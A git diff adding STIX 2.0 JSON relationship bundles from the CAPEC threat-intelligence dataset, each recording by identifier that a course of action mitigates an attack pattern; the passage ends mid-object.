diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json
new file mode 100644
index 0000000000000000000000000000000000000000..0d5e426ea2b90e91fb7a0f58df413d0754919b60
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--e911413e-496d-4b6e-afff-88e8e3302abb.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--cc80ef6c-6336-4a2d-92d7-79097f4c2340",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8",
+ "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json
new file mode 100644
index 0000000000000000000000000000000000000000..a57fc1c648c6847bcca118d6f3719047b70f4b93
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--b8f1cc81-6bbc-4d9c-a09a-b7b8f591854a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c",
+ "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json
new file mode 100644
index 0000000000000000000000000000000000000000..d2ca8c5c490e1584e6b6a10080ca29e3c16e67f4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--a7905198-67d6-4510-9885-2774c7a2a62e",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a",
+ "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json
new file mode 100644
index 0000000000000000000000000000000000000000..cf9790e2e845cfb7731411db4f62a7f9bd7a8ef0
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--ae68c964-19db-4467-a201-4e7d3f64f1f9",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df",
+ "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json
new file mode 100644
index 0000000000000000000000000000000000000000..978d8022316fa580f6d3c5e51cc5bcd6534a6d98
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--c9804303-7abd-4aa5-89e2-06560e7bf623",
+ "objects": [
+ {
+ "created": "2023-01-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5",
+ "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json
new file mode 100644
index 0000000000000000000000000000000000000000..38c7c3e9ef4c3bbc021ebf97e0556be422a6db03
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7.json
@@ -0,0 +1,21 @@ +{ + "id": "bundle--7615989a-0492-4729-8901-f366b3ee3c21", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json new file mode 100644 index 0000000000000000000000000000000000000000..7520b34e47d3d3c6ce4bf09862dbe12697c68b1d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--220bd1c8-1926-4def-8e58-1d16ea07eeba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json new file mode 100644 index 0000000000000000000000000000000000000000..f49d21981933d401b2cf81204715938550f56251 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f6100503-6f80-4635-b9dd-c9d1788158b5.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4a83986b-10d0-4592-8bab-c68e74304b49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json new file mode 100644 index 0000000000000000000000000000000000000000..f1d0d0f02b7c48e5a55ac58d5c29e2849da28e2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--69dd8c59-3f74-4f73-a87e-517d1eb9fda9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json new file mode 100644 index 0000000000000000000000000000000000000000..e5884f548012289fff23404bd21cca4195785ab7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fa411755-d981-4b14-9dbc-aed949041db7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e305c5f2-898a-453f-b0ba-9173be5b72bf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json new file mode 100644 index 0000000000000000000000000000000000000000..ea87082df8de29135ae0cb79255444ebd1e24103 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--34296764-6c59-488d-8576-162b8830d831", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json new file mode 100644 index 0000000000000000000000000000000000000000..03291a9ba27f4869a60f54d6f9d0c4d7feb4806d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fcdf171c-f44d-4397-8365-c74fb76197ea.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--886b0c7e-5f09-4158-8dfa-65be443ea0a1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json new file mode 100644 index 0000000000000000000000000000000000000000..801e29e5b1920a1bb5a1fa075f2b5e580fe5cf41 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd286fbd-f1da-41de-9516-8d195eb182a9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3607c98b-9cd9-4889-8766-d402f7e415bb", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json new file mode 100644 index 0000000000000000000000000000000000000000..93a75b16835ec68cc4ae0edc9d51ee77559e164c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd548983-e701-4e46-9b7c-cfc9318fd925.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ef813ef3-15b4-455d-add3-bdf2b47f9c67", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json new file mode 100644 index 0000000000000000000000000000000000000000..865feabe601106b37de394a17e76177b051fe5d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--68163871-7261-4878-9708-9dc27d23ed0f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json new file mode 100644 index 0000000000000000000000000000000000000000..2d0e1ff09090baa4dca341d74c6520372cca63be --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--117d9d7a-62ee-4e9a-8ee7-04764e2bdca8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json new file mode 100644 index 0000000000000000000000000000000000000000..9516a5218a3df1d08a55948a12ca86b44380d5cc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--94bce9ce-1641-4db4-b389-c383c41676e0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json new file mode 100644 index 0000000000000000000000000000000000000000..8ba7396694223e0607ed75cb4b4cc173cedab0ce --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--9bbda65e-6b1c-4c94-a946-258e98912965", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json new file mode 100644 index 0000000000000000000000000000000000000000..1abd7065f40160beeed16c81b3fa7141457ee33c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5a1e81e4-565b-40bd-9e14-57a0e39d0157", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ede338-8195-4a10-aefe-e52224f13800", + "target_ref": "attack-pattern--dbe3513a-5527-4aaf-a463-ead5eae2967f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json new file mode 100644 index 0000000000000000000000000000000000000000..686445fb81c869e9f0bd3b64aa552bb35ddcec7e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a1851ccf-e1ef-40af-af1d-b61b0fc3a3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json new file mode 100644 index 0000000000000000000000000000000000000000..0f025870d6f1ee6e74f2d30dd9dfb9bffcf1a32a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fe59f444-2244-4606-8c27-be7408eace85.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--8394f0c4-9736-4cfe-9955-244795103881", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe59f444-2244-4606-8c27-be7408eace85", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json new file mode 100644 index 0000000000000000000000000000000000000000..2fe8d1af07e9fd2904a00ca0f0901b72b098299c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e5622a8e-eb97-4cb9-badc-0a599ee72404", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json new file mode 100644 index 0000000000000000000000000000000000000000..a99cce35bada108534bf8d40eb20888ddaa7b27a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--47b7a47d-3171-4b26-a965-324adb4f192a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": 